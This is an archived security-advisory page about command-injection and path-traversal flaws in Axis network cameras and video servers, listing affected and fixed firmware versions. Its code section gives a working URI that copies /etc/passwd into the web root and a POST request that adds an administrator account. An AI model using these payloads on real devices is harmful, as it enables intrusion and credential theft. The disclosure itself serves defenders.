about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Axis Network Camera And Video Server Multiple Vulnerabilities


Title Axis Network Camera And Video Server Multiple Vulnerabilities
Published 2004-08-23-12:00AM
Updated 2004-08-31-08:49PM
Class Design Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  bashis <mcw@wcd.se> disclosed these vulnerabilities.
Vulnerable  Axis Communications StorPoint CD
Axis Communications Serial Server 2490
Axis Communications Network DVR 2460
Axis Communications MPEG2 Video Server 250S
Axis Communications 250S Video Server 3.0 3
Axis Communications 250S MPEG2 Video Server 3.10
Axis Communications 2490 Serial Server 2.11.3
Axis Communications 2460 Network DVR 3.11
Axis Communications 2460 Network DVR 3.10
Axis Communications 2420 Video Server 2.34
Axis Communications 2420 Video Server 2.32
Axis Communications 2420 Network Camera 2.41
Axis Communications 2420 Network Camera 2.40
Axis Communications 2420 Network Camera 2.34
Axis Communications 2420 Network Camera 2.33
Axis Communications 2420 Network Camera 2.32
Axis Communications 2420 Network Camera 2.31
Axis Communications 2420 Network Camera 2.30
Axis Communications 2420 Network Camera 2.12
Axis Communications 2411 Video Server 3.13
Axis Communications 2411 Video Server 3.12
Axis Communications 2411 Video Server 3.12
Axis Communications 2401 Video Server 3.13
Axis Communications 2401 Video Server 3.12
Axis Communications 2401 Blade Video Server 3.12
Axis Communications 2401 Video Server 3.12
Axis Communications 2401 Video Server 2.34
Axis Communications 2401 Video Server 2.33
Axis Communications 2401 Video Server 2.32
Axis Communications 2401 Video Server 2.31
Axis Communications 2401 Video Server 2.30
Axis Communications 2401 Video Server 2.20
Axis Communications 2401 Video Server 1.15
Axis Communications 2401 Video Server 1.0 1
Axis Communications 2400 Video Server 3.12
Axis Communications 2400 Video Server 3.11
Axis Communications 2400 Blade Video Server 3.12
Axis Communications 2400 Video Server 2.34
Axis Communications 2400 Video Server 2.33
Axis Communications 2400 Video Server 2.32
Axis Communications 2400 Video Server 2.31
Axis Communications 2400 Video Server 2.30
Axis Communications 2400 Video Server 2.20
Axis Communications 2400 Video Server 2.0
Axis Communications 2400 Video Server 1.15
Axis Communications 2400 Video Server 1.12
Axis Communications 2400 Video Server 1.11
Axis Communications 2400 Video Server 1.10
Axis Communications 2400 Video Server 1.0 2
Axis Communications 2400 Video Server 1.0 1
Axis Communications 230 MPEG2 Video Server 3.11
Axis Communications 2130 PTZ Network Camera 2.40
Axis Communications 2130 PTZ Network Camera 2.34
Axis Communications 2130 PTZ Network Camera 2.32
Axis Communications 2130 PTZ Network Camera 2.31
Axis Communications 2130 PTZ Network Camera 2.30
Axis Communications 2120 Network Camera 2.41
Axis Communications 2120 Network Camera 2.40
Axis Communications 2120 Network Camera 2.34
Axis Communications 2120 Network Camera 2.32
Axis Communications 2120 Network Camera 2.31
Axis Communications 2120 Network Camera 2.30
Axis Communications 2120 Network Camera 2.12
Axis Communications 2110 Network Camera 2.41
Axis Communications 2110 Network Camera 2.40
Axis Communications 2110 Network Camera 2.34
Axis Communications 2110 Network Camera 2.32
Axis Communications 2110 Network Camera 2.31
Axis Communications 2110 Network Camera 2.30
Axis Communications 2110 Network Camera 2.12
Axis Communications 2100 Network Camera 2.41
Axis Communications 2100 Network Camera 2.40
Axis Communications 2100 Network Camera 2.34
Axis Communications 2100 Network Camera 2.33
Axis Communications 2100 Network Camera 2.32
Axis Communications 2100 Network Camera 2.31
Axis Communications 2100 Network Camera 2.30
Axis Communications 2100 Network Camera 2.12
Not Vulnerable  Axis Communications 250S MPEG-2 Video Server 3.20
Axis Communications 2460 Digital Video Recorder 3.13
Axis Communications 2420 Network Camera 2.42
Axis Communications 2411 Video Server 3.13
Axis Communications 2401 Blade Video Server 3.13
Axis Communications 2401 Video Server 3.13
Axis Communications 2401 Video Server 2.34.1
Axis Communications 2400 Video Server 3.13
Axis Communications 2400 Blade Video Server 3.13
Axis Communications 2400 Video Server 2.34.1
Axis Communications 230 MPEG-2 Video Server 3.20
Axis Communications 2130 Network Camera 2.42
Axis Communications 2120 Network Camera 2.42
Axis Communications 2110 Network Camera 2.42
Axis Communications 2100 Network Camera 2.42
Code   Exploits are not required for these vulnerabilities. Examples have been provided:

A URI sufficient to exploit the first vulnerability:
http://www.example.com/axis-cgi/io/virtualinput.cgi?x60cat</etc/passwd>/mnt/flash/etc/httpd/html/passwdx60

Example contents of POST data sufficient to exploit the second vulnerability:
POST /cgi-bin/scripts/../../this_server/ServerManager.srv HTTP/1.0
Content-Length: 250
Pragma: no-cache

conf_Security_List=root%%3AADVO%%3A%%3Awh00t%%3AAD%%3A119104048048116%%3A&users=wh00t&username=wh00t&password1=wh00t&password2=wh00t&checkAdmin=on&checkDial=on&checkView=on&servermanager_return_page=%%2Fadmin%%2Fsec_users.shtml&servermanager_do=set_variables
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 11:49:43 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
sexxxxvide vuln/explo DRDos for www.bi sexxxxvide exploit nu femalesexy sex toy wyclef jea mojo mail news for C &amp;a news for c news for c carrd Wap.xxl.ne sexmather vedew Www.xxxpow Www.sxsy.c www.waptrk news for c elzorg Www.xxxpow Xesi smartgb 200+%252Fc jayaprada school bus a...html%2 omni dfhyj voloo.cn www.stock0 Sexofwoman local+expl curso xingu38.bl Ludhianase 23nini.com RIYA SEN mambo/inde galley2 cat /error sex inject Ludhianase BIND 9.3.4 my1988.tao ...t/admi www.pfpfpf